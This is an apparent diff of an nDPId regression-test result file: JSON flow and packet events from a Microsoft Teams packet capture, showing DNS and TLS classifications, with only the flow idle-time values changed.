00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1792,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1587041685127,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1587041685127,"pkt":"KDc3AG3IEBMx8Tl2CABFAADKzTRAADkR8JbAqAEBwKgBBgA1xd0AtgAAqleBgAABAAMAAAAAA2FwaQtmbGlnaHRwcm94eQV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAHADAAFAAEAAA4OACoDYXBpC2ZsaWdodHByb3h5BXRlYW1zDnRyYWZmaWNtYW5hZ2VyA25ldADAQQAFAAEAAAEsACcbYy1mbGlnaHRwcm94eS1ldW5vLTAxLXRlYW1zCGNsb3VkYXBwwGbAdwABAAEAAAAGAAQ0ck2I"} 
00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1792,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685093,"flow_last_seen":1587041685127,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1587041685127,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.flightproxy.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.136"}} 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1797,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1587041685136,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1587041685136,"pkt":"KDc3AG3IEBMx8Tl2CABFAADDZa9AADkRWCPAqAEBwKgBBgA17z0ArwAAVKqBgAABAAMAAAAABGV1YXoCdHIFdGVhbXMJbWljcm9zb2Z0A2NvbQAAAQABwAwABQABAAALoAAiBGV1YXoCdHIFdGVhbXMOdHJhZmZpY21hbmFnZXIDbmV0AMA5AAUAAQAAAAAAMBJiLXRyLXRlYW1zLWV1bm8tMDULbm9ydGhldXJvcGUIY2xvdWRhcHAFYXp1cmXAJMBnAAEAAQAAAAoABDRy+ns="} 
@@ -245,70 +245,70 @@ 00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1798,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685171,"flow_last_seen":1587041685171,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041685171,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"outlook.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1799,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1587041685185,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1587041685185,"pkt":"KDc3AG3IEBMx8Tl2CABFAADeqaxAADkRFAvAqAEBwKgBBgA15FkAygAAl0WBgAABAAYAAAAAB291dGxvb2sGb2ZmaWNlA2NvbQAAAQABwAwABQABAAAANQAMCXN1YnN0cmF0ZcAUwDAABQABAAAAxQAUCXN1YnN0cmF0ZQdtcy1hY2RjwBTASAAFAAEAAAAmAAgFYWZkLWvAFMBoAAUAAQAAACYAKBJvdXRsb29rLW9mZmljZS1jb20Gay0wMDAyCGstbXNlZGdlA25ldADAfAAFAAEAAACgAALAj8CPAAEAAQAAAJ8ABA1rEgs="} 
00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1799,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685171,"flow_last_seen":1587041685185,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041685185,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"outlook.office.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.18.11"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1805,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685232,"flow_last_seen":1587041685232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685232,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1805,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1587041685232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685232,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyIAbtyjZOTAAAAALAC\/\/8ViAAAAgQFtAEDAwUBAQgKMIS5SgAAAAAEAgAA"} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1806,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685240,"flow_last_seen":1587041685240,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685240,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1806,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1587041685240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685240,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOyKAbtGGzTNAAAAALAC\/\/8rVAAAAgQFtAEDAwUBAQgKMIS5UgAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1805,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685232,"flow_last_seen":1587041685232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685232,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1805,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1587041685232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685232,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyIAbtyjZOTAAAAALAC\/\/8ViAAAAgQFtAEDAwUBAQgKMIS5SgAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1806,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685240,"flow_last_seen":1587041685240,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685240,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1806,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1587041685240,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685240,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOyKAbtGGzTNAAAAALAC\/\/8rVAAAAgQFtAEDAwUBAQgKMIS5UgAAAAAEAgAA"} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1807,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685243,"flow_last_seen":1587041685243,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041685243,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1807,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1587041685243,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1587041685243,"pkt":"EBMx8Tl2KDc3AG3ICABFAABPU3QAAP8R5NHAqAEGwKgBAchtADUAO5eNyGMBAAABAAAAAAAAFHNreXBlZGF0YXByZGNvbG5ldTA0CGNsb3VkYXBwA25ldAAAHAAB"} 00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1807,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685243,"flow_last_seen":1587041685243,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041685243,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1808,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685248,"flow_last_seen":1587041685248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685248,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1808,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1587041685248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685248,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyLAbsws\/klAAAAALAC\/\/\/xvAAAAgQFtAEDAwUBAQgKMIS5WgAAAAAEAgAA"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1809,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685251,"flow_last_seen":1587041685251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685251,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1809,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1587041685251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685251,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR4XAqAEGKH4JB+yMAbvF6IfFAAAAALAC\/\/8d8gAAAgQFtAEDAwUBAQgKMIS5XQAAAAAEAgAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1810,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1587041685253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685253,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0w5JAAHUGiY00ccKEwKgBBgG77IqoHlkCRhs0zoAS\/\/9MIAAAAgQFoAEDAwgBAQQC"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1811,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1587041685253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041685253,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOyKAbtGGzTOqB5ZA1AQIABs3wAA"} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1812,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685240,"flow_last_seen":1587041685253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041685253,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1808,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685248,"flow_last_seen":1587041685248,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685248,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1808,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1587041685248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685248,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyLAbsws\/klAAAAALAC\/\/\/xvAAAAgQFtAEDAwUBAQgKMIS5WgAAAAAEAgAA"} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1809,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685251,"flow_last_seen":1587041685251,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685251,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1809,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1587041685251,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685251,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR4XAqAEGKH4JB+yMAbvF6IfFAAAAALAC\/\/8d8gAAAgQFtAEDAwUBAQgKMIS5XQAAAAAEAgAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1810,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1587041685253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685253,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0w5JAAHUGiY00ccKEwKgBBgG77IqoHlkCRhs0zoAS\/\/9MIAAAAgQFoAEDAwgBAQQC"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1811,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1587041685253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041685253,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOyKAbtGGzTOqB5ZA1AQIABs3wAA"} 
+00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1812,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685240,"flow_last_seen":1587041685253,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041685253,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1813,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1587041685256,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1587041685256,"pkt":"KDc3AG3IEBMx8Tl2CABFAACb\/nFAADkRv4jAqAEBwKgBBgA1yG0AhwAAyGOBgAABAAAAAQAAFHNreXBlZGF0YXByZGNvbG5ldTA0CGNsb3VkYXBwA25ldAAAHAABwCEABgABAAAADgBABHByZDEOYXp1cmVkbnMtY2xvdWTAKgZtc25oc3QJbWljcm9zb2Z0A2NvbQB9o\/w8AAADhAAAASwACTqAAAAAPA=="} 
00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1813,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685243,"flow_last_seen":1587041685256,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041685256,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1814,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1587041685261,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685261,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0jN1AAG0Ge5k0cg8twKgBBgG77IfA1AaRAv0Ol4AS\/\/+iigAAAgQFoAEDAwgBAQQC"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1815,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1587041685261,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041685261,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGNYPAqAEGNHIPLeyHAbsC\/Q6XwNQGklAQIADDSQAA"} 
-00990{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1816,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685106,"flow_last_seen":1587041685262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1587041685262,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01338{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1824,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041685240,"flow_last_seen":1587041685269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6122,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1587041685269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","server_names":"*.config.teams.microsoft.com,config.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"7d8fd34fdb13a7fff30d5a52846b6c4c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=config.teams.microsoft.com","fingerprint":"B9:54:54:12:C9:E9:43:65:10:70:04:7B:AD:B6:0C:46:06:38:A5:FA"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1828,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1587041685278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041685278,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8aa1AAGwGYc00ck0hwKgBBgG77IgacWa+co2TlKASIABIJQAAAgQFoAEDAwgEAggKYR7cGTCEuUo="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1829,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1587041685278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685278,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyIAbtyjZOUGnFmv4AQEAmGrAAAAQEICjCEuXNhHtwZ"} 
-00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1830,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685232,"flow_last_seen":1587041685278,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041685278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 